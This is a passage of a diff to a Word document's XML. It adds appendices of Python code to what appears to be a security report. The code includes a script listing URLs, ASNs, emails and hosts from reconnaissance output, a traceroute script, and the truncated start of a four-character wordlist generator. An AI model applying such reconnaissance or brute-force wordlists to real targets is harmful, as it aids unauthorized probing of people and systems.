+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>sys.argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>print("Discovered URLs")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>print("\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>nDiscovered</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ASNs")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>asns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_asns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>print("\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>nDiscovered</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> emails")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">email = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_emails</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>print("\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>nDiscovered</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hosts")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hosts = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_hosts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Appendix </w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:t>traceroute_to_o</w:t>
@@ -8486,114 +12867,6 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>traceroute_proc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>subprocess.Popen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(['traceroute', '{}'.format(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ip_addr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">)], </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>stdout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>subprocess.PIPE</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8620,6 +12893,114 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
+        <w:t>traceroute_proc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>subprocess.Popen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(['traceroute', '{}'.format(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)], </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>stdout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>subprocess.PIPE</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>traceroute_stdout</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -9273,7 +13654,25 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">        #print(ttl_values)</w:t>
+        <w:t xml:space="preserve">        #</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(ttl_values)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9536,6 +13935,1122 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>main()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc64661825"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>Appendix 3: create-wordlist.py</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>itertools</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>nums</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = '0123456789'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>chrs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = '</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>abcdefghijklmnopqrstuvwxyz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>n = 4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
